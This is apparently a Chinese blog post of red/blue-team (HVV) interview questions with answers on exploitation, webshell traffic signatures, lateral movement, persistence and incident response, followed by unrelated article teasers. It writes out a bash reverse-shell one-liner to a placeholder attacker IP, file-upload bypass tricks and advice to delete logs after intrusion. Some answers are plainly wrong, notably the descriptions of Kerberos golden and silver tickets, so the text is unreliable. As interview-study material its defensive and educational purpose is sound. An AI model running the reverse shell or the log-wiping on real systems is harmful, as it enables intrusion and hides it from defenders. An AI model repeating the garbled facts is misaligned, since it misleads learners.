2025国家护网HVV高频面试题总结来了04(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
一、HVV行动面试题分类
根据面试题的内容,我们将其分为以下几类:
漏洞利用与攻击技术
防御与应急响应
工具与流量特征
内网渗透与横向移动
溯源与反制
安全设备与日志分析
权限维持与后渗透
常见漏洞与利用方式
网络安全基础知识
二、分类解析与答案
漏洞利用与攻击技术
1:shiro的流量特征是什么?
Shiro的流量特征通常包括Cookie中的`rememberMe`字段,攻击者通过构造恶意的序列化数据,利用Shiro的反序列化漏洞进行攻击。常见的攻击流量中会包含`rememberMe`字段,且其值为经过AES加密的恶意序列化数据。
2:fastjson不出网怎么利用?
当fastjson不出网时,可以通过以下方式利用:
- 将命令执行结果写入静态文件,然后通过其他方式读取。
- 使用DNSLog外带数据。
- 利用Commons-io写文件或植入Webshell。
- 通过BECL攻击导致命令执行或植入内存马。
3:Java内存马如何排查?
Java内存马通常通过Filter、Servlet、Listener等方式植入。
排查思路包括:
- 检查Filter、Servlet、Listener等组件的加载情况。
- 使用工具(如Arthas)动态排查内存中的可疑类。
- 对于冰蝎类型的内存马,可以通过分析JVM内存中的类加载情况,查找可疑的类名或方法。
4:讲下内存⻢排查思路?
- 首先判断是什么方式注入的内存马
- 可以通过查看web日志,以及看是否有类似哥斯拉、冰蝎的流量特征
- 如果web日志中没有发现,那么我们就可以排查中间件的error.log日志
防御与应急响应
1:内网爆出多条异常该怎么处理?
处理内网异常时,应按照以下步骤进行:
-隔离:立即隔离受感染的机器,防止横向扩散。
-分析:分析异常流量的来源和目的,确定攻击类型。
-修复:修复漏洞,清除恶意文件或进程。
- 监控:加强监控,确保攻击已被彻底清除。
2:如何判断文件上传告警是否为真实攻击?
判断文件上传告警是否为真实攻击的步骤包括:
-分析文件内容:检查上传的文件是否为Webshell或其他恶意文件。
-检查请求来源:分析上传请求的IP地址和User-Agent,判断是否为恶意来源。
-验证漏洞:确认上传功能是否存在漏洞,是否可以被利用。
工具与流量特征
1:CS和MSF的流量特征是什么?
- Cobalt Strike (CS):CS的流量特征包括加密的HTTP/HTTPS通信,常见的URI路径如`/jquery-3.3.1.min.js`,以及Beacon的心跳包。
- Metasploit Framework (MSF):MSF的流量特征包括特定的URI路径(如`/meterpreter/reverse_tcp`),以及Meterpreter的加密通信。
2:菜刀、蚁剑、冰蝎、哥斯拉的流量特征是什么?
- 蚁剑流量特征主要表现在数据包的加密方式和数据类型。蚁剑使用了AES加密算法对数据进行加密,同时还使用了自定义的二进制协议,在通信中传输各种类型的数据。
- 菜刀流量特征主要表现在HTTP协议上,使用HTTP协议通信,控制命令和数据都通过POST请求传输。因此,可以通过HTTP请求头中的User-Agent、Referer等信息进行识别,eval函数必不可少,有可能会被asser代替。
- 冰蝎流量特征主要表现在数据包中的特殊标记和传输的数据类型。冰蝎的数据包中包含了特定的标记,如"1ag=0x52415631",用于标识该数据包是冰蝎的控制命令。此外,冰蝎还使用了一种自定义的二进制协议,在通信中传输各种类型的数据
- 哥斯拉则流量特征主要表现在数据包的特殊标记和数据类型。哥斯拉的数据包中包含了特定的标记,如"XORHEAD"和"XORBODY",用于标识该数据包是哥斯拉的控制命令。此外,哥斯拉还使用了一种自定义的二进制协议,在通信中传输各种类型的数据。
内网渗透与横向移动
1:内网不出网怎么利用?
当内网不出网时,可以通过以下方式利用:
- SMB协议:利用SMB协议进行横向移动,如通过PsExec、WMI等工具。
- 代理转发:使用工具如frp、ngrok等进行端口转发,将内网服务暴露到外网。
- DNS隧道:通过DNS隧道进行数据传输,绕过网络限制。
2:如何判断二层网络FPP文件落地成功?
判断FPP文件是否落地成功可以通过以下方式:
-网络抓包:使用Wireshark等工具抓取网络流量,分析是否有FPP文件的传输。
-日志分析:检查目标系统的日志,查看是否有文件写入的记录。
-文件校验:通过MD5或SHA1校验文件完整性,确认文件是否成功落地。
3:讲下黄金票据和白银票据?
-黄金票据:也称为“域管理员组帐户”,拥有黄金票据的用户可以访问域中所有计算机的本地管理员帐户,能够创建新的域管理员和更改现有的域管理员帐户密码
-白银票据:通常属于本地管理员帐户,只能访问本地计算机并执行特定任务。无法访问其他计算机或管理其他本地管理员帐户
-区别:
黄金票据通常指一个具有域管理员权限的票据,而白银票据通常指普通用户的票据
溯源与反制
1:如何溯源拿到手机号码?
溯源手机号码的步骤包括:
-分析日志:通过分析攻击流量的日志,查找攻击者的IP地址。
-关联信息:通过IP地址关联到攻击者的手机号码或其他个人信息。
-社工手段:通过社工手段(如钓鱼邮件)获取攻击者的手机号码。
2:如何判断SQL注入是否成功?
判断SQL注入是否成功可以通过以下方式:
-回显信息:查看页面是否返回数据库的错误信息或查询结果。
-延时注入:通过延时函数(如`sleep`)判断注入是否成功。
-布尔盲注:通过布尔逻辑判断注入是否成功。
安全设备与日志分析
1. 如何从海量告警中筛选出真实有效的攻击?
筛选真实攻击的步骤包括:
-告警分类:根据告警类型(如SQL注入、文件上传等)进行分类。
-流量分析:分析告警流量的来源、目的和内容,判断是否为恶意流量。
-误报排除:通过规则或人工分析排除误报,如扫描器流量、正常业务流量等。
2:如何分析Web日志?
Web日志分析的关键在于识别异常请求。可以通过分析HTTP状态码、请求频率、请求路径、User-Agent等信息,找出可疑的访问行为。常见的攻击特征包括SQL注入、XSS、文件上传等。
3:常用的渗透测试端口有哪些?
常用的渗透测试端口包括:
- 22 (SSH)
- 80 (HTTP)
- 443 (HTTPS)
- 445 (SMB)
- 3389 (RDP)
- 3306 (MySQL)
- 8080 (HTTP Alt)
权限维持与后渗透
1:权限维持有哪些方式?
权限维持的常见方式包括:
- 创建隐藏用户或后门账户
- 植入Webshell或内存马
- 利用计划任务或服务持久化
- 使用黄金票据或白银票据进行Kerberos认证绕过
2:如何反弹Shell?
反弹Shell的常见方法包括使用Netcat、Bash、Python等工具。例如,使用`bash -i >& /dev/tcp/<攻击者IP>/<端口> 0>&1`命令可以将Shell反弹到攻击者的机器上。
3:如何清除渗透后的痕迹?
清除渗透痕迹的步骤包括:
- 删除日志:删除系统日志、Web日志、安全设备日志等。
- 清理文件:删除上传的Webshell、后门文件等。
- 恢复配置:恢复被修改的系统配置、服务配置等。
常见漏洞与利用方式
1:SQL注入的原理是什么?
SQL注入是通过在用户输入中插入恶意的SQL代码,使得应用程序在执行数据库查询时执行这些恶意代码。攻击者可以通过SQL注入获取数据库中的敏感信息、修改数据、甚至控制整个数据库服务器。
2:文件上传的绕过方式有哪些?
文件上传的绕过方式包括:
- 修改文件扩展名
- 使用双扩展名(如`shell.php.jpg`)
- 修改Content-Type
- 利用文件头绕过检测
- 使用空字节截断(如`shell.php%00.jpg`)
3:常见的未授权访问漏洞有哪些?
常见的未授权访问漏洞包括:
- Redis未授权访问:通过未授权访问Redis,获取敏感数据或执行命令。
- MongoDB未授权访问:通过未授权访问MongoDB,获取数据库内容。
- Elasticsearch未授权访问:通过未授权访问Elasticsearch,获取索引数据。
4:文件上传的绕过方式有哪些?
文件上传的绕过方式包括:
- 修改文件扩展名:将恶意文件扩展名改为允许上传的类型(如.jpg改为.php)。
- 修改Content-Type:将请求头中的Content-Type改为允许的类型(如image/jpeg)。
- 双写扩展名:通过双写扩展名绕过检测(如shell.php.jpg)
网络安全基础知识
1:什么是公钥基础设施(PKI)?
公钥基础设施(PKI)是一种基于公钥加密技术的安全框架,用于管理数字证书和公钥。PKI在网络安全中扮演着重要角色,主要用于身份验证、数据加密和数字签名。
2:正向代理和反向代理的区别是什么?
-正向代理:客户端通过代理服务器访问外部资源,代理服务器隐藏客户端的真实IP。
-反向代理:客户端通过代理服务器访问内部资源,代理服务器隐藏后端服务器的真实IP。
3:HTTP状态码200、302、403、404分别表示什么?
-200 请求成功
-302跳转
-403 权限拒绝
-404 页面资源不存在
其他
1.:您有没有HVV经历?做的什么岗位?
2.:您参与过哪些项目?
3.:您看过哪些安全设备?
......
对于这类问题,如果缺乏实际经验,通常会被归为初级水平(除非在技术上表现特别出色)。因此,在回答时,你要尽可能详尽地展示自己对安全设备的理解,包括与之相关的硬件(HW)知识。同时,强调自己已经为此做了充分的准备,展现出对安全领域的热情和专注。
4:毕业了吗,那平时工作具体工作内容是什么?
已经毕业了;平常在公司,主要负责公司项目渗透测试、应急响应、安全加固、安全培训等工作。
5:平常有挖过src嘛?可以说说你的资产收集过程嘛?
-首先确定我们要挖的公司资产
-使用wps,新建一个exec表格,里面新建好几个表格,备注比如:根域名、子域名、小程序、app以及漏洞提交进度等情况
-上爱企查看这个企业的知识产权,然后看网站备案,然后看这个公司的股权穿透图,这里有一个找边缘资产的好方法,就是看股权穿透图找下面的子公司,但是不同的企业src收录标准不一
-使用小蓝本查该公司的一个小程序、app,然后保存在exec表格里面
-使用oneforall工具进行子域名挖掘,然后保存到一个txt里面,再使用灯塔进行子域名挖掘,再汇总,然后使用无影工具里面的辅助模块进行资产分类
-使用灯塔ARL自动化跑,去找一些文件泄露的漏洞
6:有自己的技术博客嘛,在先知、freebuf等平台发表过文章嘛?
都有,自己一直有保持写技术博文的习惯
7:你学校成绩如何有挂科吗?
学习成绩优秀,没有挂过科;在校期间获得多次校级奖学金以及各种荣誉;或者比赛相关成绩
8:未来你想做安全的哪一个领域?
目前的话还是打算先以贵公司实习为目的,然后以后打算安全的方向的话主要以渗透测试、安服、红蓝攻防这些方向靠。
相关文章:
2025国家护网HVV高频面试题总结来了04(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 一、HVV行动面试题分类 根据面试题的内容,我们将其分为以下几类: 漏洞利用与攻击技术 …...
我的AI工具箱Tauri版-通用音频转文本
本模块支持FunAsr和FasterWhisper两种模式,可批量处理音频与视频文件,自动生成txt文本与srt字幕,满足多种应用场景需求。 工具内置FunAsr,无需额外参数调整,特别适用于中文语音的高质量转录,确保识别准确率…...
Vue.js计算属性
计算属性 基础示例 模板中的表达式虽然方便,但也只能用来做简单的操作。如果在模板中写太多逻辑,会让模板变得臃肿,难以维护。比如说,我们有这样一个包含嵌套数组的对象: js const author = reactive({name: John Doe,books: [Vue 2 - Advanced Guide,Vue 3 - Bas…...
品佳诚邀您参加 3/12『英飞凌汽车方案引领智能座舱新纪元』在线研讨会
英飞凌汽车方案引领智能座舱新纪元 時間:2025年3月12日 14:00-15:30 品佳诚邀您参加本次线上直播,深入了解英飞凌如何引领智能座舱技术革新! 随著科技的飞速发展,汽车已不再仅仅是交通工具,而是集成了丰富智能功能的…...
科普|无人机专业术语
文章目录 前言一、飞控二、电调三、通道四、2S、3S、4S电池五、电池后面C是什么意思?六、电机的型号七、什么是电机的KV值?八、螺旋桨的型号九、电机与螺旋桨的搭配 前言 无人机飞控系统控制飞行姿态,电调控制电机转速,遥控器通道控制飞行动作。电池C…...
Tauri跨平台开发问题及解决方案深度解析(React版)
Tauri跨平台开发问题及解决方案深度解析(React版) 一、环境配置与项目初始化难题(React适配) 1.1 React项目初始化 推荐模板: # 使用ReactTypeScript模板 npm create tauri-applatest -- --template react-ts# 项目…...
基于单片机和Wifi技术的智能台灯设计
摘要 :本文主要介绍了基于单片机AT89C51和Wifi技术的智能台灯的硬件和软件设计。该智能台灯具有根据当前光线自动调节灯光亮度的功能,还可对用户使用台灯时处于非正常的距离和姿态时给予报警提示,用户可以随时通过手机app查询智能台灯的报警记…...
ds回答-开源llm应用开发平台
以下是几个著名的开源 LLM 应用开发平台,涵盖不同场景和技术特点: 1. Dify 特点:低代码 / 无代码开发、支持 RAG 检索、Agent 智能体、模型管理、LLMOps 全流程优化。核心功能:可视化工作流编排、数百种模型兼容(如 GP…...
【量化策略】均值回归策略
【量化策略】均值回归策略 🚀量化软件开通 🚀量化实战教程 技术背景与应用场景 在金融市场中,价格波动是常态,但长期来看,资产价格往往会围绕其历史平均水平上下波动。均值回归策略正是基于这一现象设计的量化交易…...
iterm2更新后主题报错
报错 .oh-my-zsh/themes/agnoster.zsh-theme:307: parse error near <<<。方法1:更新Oh My Zsh主题(以agnoster为例) 适用场景:使用Oh My Zsh自带主题(如agnoster)时出现语法错误。 备份当前主题…...
深度学习架构Seq2Seq-添加并理解注意力机制(一)
第一章:人工智能之不同数据类型及其特点梳理 第二章:自然语言处理(NLP):文本向量化从文字到数字的原理 第三章:循环神经网络RNN:理解 RNN的工作机制与应用场景(附代码) 第四章:循环神经网络RNN、LSTM以及GR…...
Kafka底层结构
1. Kafka 架构总览 Kafka 是一个分布式消息队列,采用**发布-订阅(Pub-Sub)**模式,核心组件包括: Producer(生产者): 负责向 Kafka 发送消息。Broker(Kafka 服务器&…...
[BUUCTF]web--wp(持续更新中)
ps:文章所引用知识点链接,如有侵权,请联系删除 [极客大挑战 2019]EasySQL 题目类型:简单SQL注入 发现是登录页面,用万能登录方法测试,两种语句均能解出flag [极客大挑战 2019]Havefun 题目类型:代码审计…...
axios请求设置request umijopenai生产前端请求 ts状态全局 v-if v-else 与动态js变量
axios请求 安装 npm install axios全局自定义请求 集中处理设置 集体通用请求 example const instance axios.create({baseURL: https://some-domain.com/api/,timeout: 1000,headers: {X-Custom-Header: foobar} });请求前 请求后 拦截器 // 添加请求拦截器 axios.in…...
SparkSQL全之RDD、DF、DS ,UDF、架构、资源划分、sql执行计划、调优......
1 SparkSQL概述 1.1 sparksql简介 Shark是专门针对于spark的构建大规模数据仓库系统的一个框架Shark与Hive兼容、同时也依赖于Spark版本Hivesql底层把sql解析成了mapreduce程序,Shark是把sql语句解析成了Spark任务随着性能优化的上限,以及集成SQL的一些…...
深入理解Linux内存缓存:提升性能的关键
在深入探索 Linux 系统的奇妙世界时,内存管理无疑是一个至关重要的领域。而在 Linux 内存体系中,Cache 扮演着举足轻重的角色。它就像是一位默默奉献的幕后英雄,为系统的高效运行立下汗马功劳。那么,Linux 内存中的 Cache 究竟是什…...
STM32-FOC-SDK包含以下关键知识点
STM32-FOC-SDK(Field-Oriented Control - Software Development Kit)是专为STM32微控制器设计的一套软件开发工具,用于实现电机控制的磁场定向控制(Field Oriented Control,简称FOC)。STM32是一款基于ARM C…...
sql调优:优化响应时间(优化sql) ; 优化吞吐量
Sql性能调优的目的 1.优化响应时间>>优化sql 经过调优后,执行查询、更新等操作的时候,数据库的反应速度更快,花费的时间更少。 2.优化吞吐量 即“并发”, 就是“同时处理请求”的能力。 优化sql 尽量将多条SQL语句压缩到一句>…...
【Mybatis】如何简单使用mybatis-plus,以及MybatisGenerator自动生成或者实现SQL语句
前言 🌟🌟本期讲解关于mybatis中SQL自动生成的相关知识介绍~~~ 🌈感兴趣的小伙伴看一看小编主页:GGBondlctrl-CSDN博客 🔥 你的点赞就是小编不断更新的最大动力 🎆…...
Halcon 车牌识别-超精细教程
车牌示例 流程: 读取图片转灰度图阈值分割,找车牌内容将车牌位置设置变换区域形状找到中心点和弧度利用仿射变换,斜切车牌旋转转正,把车牌抠出来利用形态学操作拼接车牌号数字训练ocr开始识别中文车牌 本文章用到的算子(解析) Halcon 算子-承接车牌识别-CSDN博客 rgb1_to_gray…...
利用最小二乘法找圆心和半径
#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …...
阿里云ACP云计算备考笔记 (5)——弹性伸缩
目录 第一章 概述 第二章 弹性伸缩简介 1、弹性伸缩 2、垂直伸缩 3、优势 4、应用场景 ① 无规律的业务量波动 ② 有规律的业务量波动 ③ 无明显业务量波动 ④ 混合型业务 ⑤ 消息通知 ⑥ 生命周期挂钩 ⑦ 自定义方式 ⑧ 滚的升级 5、使用限制 第三章 主要定义 …...
边缘计算医疗风险自查APP开发方案
核心目标:在便携设备(智能手表/家用检测仪)部署轻量化疾病预测模型,实现低延迟、隐私安全的实时健康风险评估。 一、技术架构设计 #mermaid-svg-iuNaeeLK2YoFKfao {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg…...
前端倒计时误差!
提示:记录工作中遇到的需求及解决办法 文章目录 前言一、误差从何而来?二、五大解决方案1. 动态校准法(基础版)2. Web Worker 计时3. 服务器时间同步4. Performance API 高精度计时5. 页面可见性API优化三、生产环境最佳实践四、终极解决方案架构前言 前几天听说公司某个项…...
华为OD机试-食堂供餐-二分法
import java.util.Arrays; import java.util.Scanner;public class DemoTest3 {public static void main(String[] args) {Scanner in new Scanner(System.in);// 注意 hasNext 和 hasNextLine 的区别while (in.hasNextLine()) { // 注意 while 处理多个 caseint a in.nextIn…...
现代密码学 | 椭圆曲线密码学—附py代码
Elliptic Curve Cryptography 椭圆曲线密码学(ECC)是一种基于有限域上椭圆曲线数学特性的公钥加密技术。其核心原理涉及椭圆曲线的代数性质、离散对数问题以及有限域上的运算。 椭圆曲线密码学是多种数字签名算法的基础,例如椭圆曲线数字签…...
04-初识css
一、css样式引入 1.1.内部样式 <div style"width: 100px;"></div>1.2.外部样式 1.2.1.外部样式1 <style>.aa {width: 100px;} </style> <div class"aa"></div>1.2.2.外部样式2 <!-- rel内表面引入的是style样…...
Rust 异步编程
Rust 异步编程 引言 Rust 是一种系统编程语言,以其高性能、安全性以及零成本抽象而著称。在多核处理器成为主流的今天,异步编程成为了一种提高应用性能、优化资源利用的有效手段。本文将深入探讨 Rust 异步编程的核心概念、常用库以及最佳实践。 异步编程基础 什么是异步…...
ip子接口配置及删除
配置永久生效的子接口,2个IP 都可以登录你这一台服务器。重启不失效。 永久的 [应用] vi /etc/sysconfig/network-scripts/ifcfg-eth0修改文件内内容 TYPE"Ethernet" BOOTPROTO"none" NAME"eth0" DEVICE"eth0" ONBOOT&q…...
AirSim/Cosys-AirSim 游戏开发(四)外部固定位置监控相机
这个博客介绍了如何通过 settings.json 文件添加一个无人机外的 固定位置监控相机,因为在使用过程中发现 Airsim 对外部监控相机的描述模糊,而 Cosys-Airsim 在官方文档中没有提供外部监控相机设置,最后在源码示例中找到了,所以感…...
